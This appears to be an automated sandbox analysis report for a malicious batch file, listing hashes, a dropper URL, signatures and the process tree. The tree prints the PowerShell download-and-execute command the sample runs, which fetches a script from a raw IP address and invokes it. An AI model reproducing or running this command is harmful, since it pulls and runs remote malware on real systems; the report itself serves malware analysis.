Analysis
-
max time kernel
127s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
d414776d8291887b69e7e08716350a94.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d414776d8291887b69e7e08716350a94.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
d414776d8291887b69e7e08716350a94.bat
-
Size
216B
-
MD5
44b1551634044bfd5c2101792984ab6a
-
SHA1
c1c890dd032188b9c1488e5cf4ff4f22d88b74e5
-
SHA256
d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4
-
SHA512
faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1772 1344 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1772 WerFault.exe Token: SeBackupPrivilege 1772 WerFault.exe Token: SeDebugPrivilege 1772 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe 1772 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"1⤵PID:1140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"2⤵PID:1344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1772